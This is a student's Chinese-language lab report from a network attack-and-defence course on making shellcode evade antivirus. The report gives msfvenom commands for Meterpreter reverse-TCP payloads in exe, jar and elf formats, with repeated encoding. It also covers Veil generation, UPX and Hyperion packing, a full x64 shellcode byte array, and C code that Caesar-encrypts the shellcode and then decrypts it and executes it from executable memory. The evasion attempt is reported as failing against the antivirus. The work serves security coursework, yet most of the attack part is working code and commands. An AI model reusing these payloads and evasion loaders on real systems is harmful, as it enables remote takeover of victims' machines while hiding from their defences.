20222315 2024-2025-3 《网络与系统攻防技术》实验三实验报告

1.实验内容

通过多次加密、文件格式欺骗、填充、加壳等技术实现shellcode免杀，产生恶意程序，并尝试通过杀毒软件，不被杀毒软件查杀。
1、通过使用msf编码器，用msfvenom命令生成exe，jar等文件。
2、使用veil、夹壳工具来尝试让shellcode实现免杀：
3、使用C+shellcode编程;
4、尝试将文件格式欺骗、填充、夹壳、多次加密等技术结合实现shellcode免杀;
5、进行测试，在使用各种杀毒软件的同时运行程序，并成功实现回连，注明电脑的杀软及其版本。

2、实验过程

1、使用msfvenom生成exe等文件
在kali中打开终端并输入msfvenom --list formats，来查看msfvenom支持的所有输出格式;

2、输入命令ifconfig查看虚拟机ip

3、输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.255.139 LPORT=8888 -f exe > 20222315lxy.exe，生成payload；
-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型，是一个 Meterpreter 反向 TCP 连接；
LHOST=172.16.255.139设置了连接回的本地 IP 地址，即kali虚拟机的 IP 地址；
LPORT=8888设置了连接回的本地端口号；
-f exe: 这指定了输出格式为 Windows 可执行文件；

4、输入msfvenom --list encoders来查看 msfvenom 支持的所有编码方式

5、使用编码器对payload进行编码，输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=172.16.255.139 LPORT=8888 -f exe > 20222315lxy-2.exe；
-e x86/shikata_ga_nai: 这指定了要使用的编码器；
-b ‘\x00’: 这指定了需要避免的坏字符集；
LHOST、LPORT同上；

6、多次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=172.16.255.139 LPORT=8888 -f exe > 20222315lxy-3.exe；
-i 10表示编码10次；

7、选择一个适用于Java环境的payload来生成jar文件：msfvenom -p java/meterpreter/reverse_tcp LHOST=172.16.255.139 LPORT=8888 -f jar > 20222315lxy-4.jar；

8、使用编码器对payload进行编码：msfvenom -p java/meterpreter/reverse_tcp LHOST=172.16.255.139 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f jar > 20222315lxy-5.jar；

9、生成一个反向 TCP 连接的 Linux elf 可执行文件：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.225.139 LPORT=8888 -f elf > 20222315lxy-6.elf

10、使用编码器对payload进行编码：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.225.139 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f elf > 20222315lxy-7.elf

11、在kali上配置共享文件夹

12、通过命令cp 文件名 共享文件夹位置 来上传文件到主机上

13、打开VirusTotal的链接https://www.virustotal.com/ http://www.virscan.org/，放入文件，使用VirusTotal进行检测；



从检测结果可以看出这些shellcode很容易被当下的杀毒软件检测出来

使用veil工具
1、安装veil，需要保持虚拟机是联网状态，依次输入以下命令：
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32
当输入完sudo apt-get install wine32后报错，此时先输入dpkg --add-architecture i386，再输入sudo apt-get update，然后输入sudo apt-get install wine32即可；

2、再依次输入：
apt-get install veil ——安装veil
sudo su
cd /usr/share/veil/config/
vim setup.sh
veil

在第200多行的代码中，找到下图内容，按i键进入编辑模式，把下载地址换成https://gitee.com/spears/VeilDependencies.git，按ESC键，输入:wq退出；

过程中安装的多个程序一路默认即可

3、完成安装，输入veil；

输入use evasion ，进入Evil—Evasion；

输入list，查看可使用的payload类型；

这里由于上个虚拟机黑屏故障，这里我重新安装了一个虚拟机，查看新的ip地址

使用c/meterpretermrev_tcp.py，即7号，所以输入use 7；

打开新的终端
依次输入：
set LHOST 192.168.15.132 设置反弹链接ip，此处为Kali的ip
set LPORT 2315 设置端口
generate
输入生成的文件名称：20222315_veil；

使用命令ls查看下载的文件

同样，将20222315_veil.exe文件移入主机中，在之前的链接中，放入文件，使用VirusTotal进行检测；

3．使用C + shellcode编程

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.15.132 LPORT=2315 -f c，其中LHOST为反弹回连的IP，即Kali的IP（这里将buf数组复制下来）；

新建20222315.c文件，并进行编辑（将刚刚复制下来的数组写进去编写c代码）；

按ESC键，输入:wq退出编辑；
输入i686-w64-mingw32-g++ 20222315.c -o 20222315.exe；

同样重复之前的操作对上述文件进行检查

加壳
upx加壳：输入upx 20222315.exe -o upx20222315.exe；

hyperion加壳：
输入cp upx20222315.exe /usr/share/windows-resources/hyperion；
输入cd /usr/share/windows-resources/hyperion进入文件夹；
输入ls查看生成的可执行文件；

输入wine hyperion.exe -v upx20222315.exe upx20222303xpx.exe

同样对生成的文件进行检查

5．通过组合应用各种技术实现恶意代码免杀

组合技术：msfvenom生成Shellcode数组，再使用凯撒加密对数组进行加密，将加密后的密文放入txt文件中，再编写C语言代码，从txt文件中读取密文，解密并运行Shellcode，最后生成.exe可执行文件。
kali虚拟机中通过msfvenom生成Shellcode数组，msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.132 LPORT=10086 -f c；

将buf[]中的内容复制；
用codeblocks创建新建20222315blockcode.cpp文件，输入代码，代码功能为将复制内容放入shellcode1[]数组中，通过代码将shellcode1进行凯撒加密，将密文输入到2315jiami.txt文件中；
在同文件夹下新建空文件2315jiami.txt，用以存放密文；
代码如下：
#include <stdio.h>
#include<string.h>

//凯撒加密函数，适用于unsigned char数组
void caesarEncrypt(unsigned char *data, size_t length, int shift) {
for (size_t i = 0; i < length; i++) {
// 对每个字节进行位移
data[i]= (data[i] + shift) & 0xFF;
}
}
int main( ) {
unsigned char shellcode1[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f"
"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"
"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x41\x51\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x50\x8b\x48\x18\x49"
"\x01\xd0\xe3\x56\x48\xff\xc9\x4d\x31\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x27\x66\xc0\xa8\x4c\x80\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
"\xf0\xb5\xa2\x56\xff\xd5";
int shift =3; // 加密位移 
printf("original: ");
for (size_t i = 0; i < 510; i++) {
printf("\\x%02x",shellcode1[i]);
}
printf("\n");
caesarEncrypt(shellcode1,510,shift); 
printf("Encrypted:");
for (size_t i =0;i< 510; i++){
printf("\\x%02x",shellcode1[i]); 
    }
printf("\n");
    FILE *file = fopen("2315jiami.txt", "w");
    if (file != NULL) {
        for (size_t i = 0; i < 510; i++) {
            fprintf(file, "\\x%02x", shellcode1[i]);
        }
        fprintf(file, "\n");
        fclose(file);
    } else {
        printf("Error opening file!\n");
    }
return 0;
}

运行该代码

新建20222315_jiemi.cpp文件，输入代码，代码功能为读取2315jiami.txt文件中的内容到shellcode1[]数组中，并进行解密，再运行shellcode；

代码如下：

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// 凯撒解密函数，适用于unsigned char数组
void caesarDecrypt(unsigned char *data, size_t length, int shift) {
    for (size_t i = 0; i < length; i++) {
        // 对每个字节进行位移
        data[i] = (unsigned char)((data[i] - shift + 256) % 256);
    }
}

int main() {
   int shift = 3; // 凯撒加密的位移值
   unsigned char shellcode1[511]; // 假设文件中的内容不超过510字节
   char line[1024]; // 用于读取文件的临时缓冲区

   // 打开文件
   FILE *file = fopen("2315jiami.txt", "r");
   if (file == NULL) {
       perror("Error opening file");
       return 1;
   }

   // 读取文件内容到shellcode1数组中
   size_t length = 0;
   while (fgets(line, sizeof(line), file)) {
       // 将读取的十六进制字符串转换为字节并存储在shellcode1中
       for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {
           if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {
               length++;
           }
       }
   }
   fclose(file);

   // 解密shellcode
   caesarDecrypt(shellcode1, length, shift);

   // 输出解密后的shellcode
   /*printf("Decrypted Shellcode:\n");
   for (size_t i = 0; i < 510; i++) {
       printf("\\x%02x", shellcode1[i]);
   }
   printf("\n");*/

   // 分配内存并设置为可执行
   LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

   // 将解密后的shellcode复制到分配的内存中
   memcpy(exec, shellcode1, sizeof shellcode1);
   // 执行shellcode
   ((void(*)())exec)();

   return 0;
}

运行完成后我们可以看到以下文件

6．用电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本。
此时开启杀毒软件（熔火，版本号5.0.75.16）

结果失败，电脑中的病毒程序被杀毒软件查杀，经过多次尝试未果。
上网查询资料并结合所学，我认为我所参考的加密算法已经被使用，被杀毒软件所学习，并放入行为特征库中，导致我所使用的shellcode被查杀。

3、实验问题与解决

1、问题：在下载pYthon时，一直提示报错，没有空间，不能下载，在重新打开kali时kali直接黑屏

解决方法：重装kali，这次将空间设置为40个g，之后下载成功。
2、问题：在上传虚拟机文件至主机时，发现没有共享文件夹
解决方法：通过上网查询资料后，打开设置配置共享文件夹，重启后输入相关命令发现依然找不到共享文件夹，找不到hgfs，又在输入相关命令成功创建hgfs和share文件。

4、实验心得与体会

此次实验，通过配置木马程序，并将生成的木马程序交给杀毒软件查杀，结果木马程序很容易被杀毒软件查出，可见现在我们电脑的安全性，可以免疫大多数杀毒软件，最后通过多种免杀技术结合有可能实现免杀，让我感受到杀毒软件等并不是万能的，依然要提高警惕，避免电脑接触病毒程序，这次实验很遗憾未能成功实现免杀，但我相信经过未来的学习，我可以有能力发现此次问题，实现免杀。虽然未能完全完成此次实验，但我依然学到了很多，比如如何运用kali生成恶意代码，如何运用杀毒软件进行查杀，对我未来的工作内容有着重大的作用。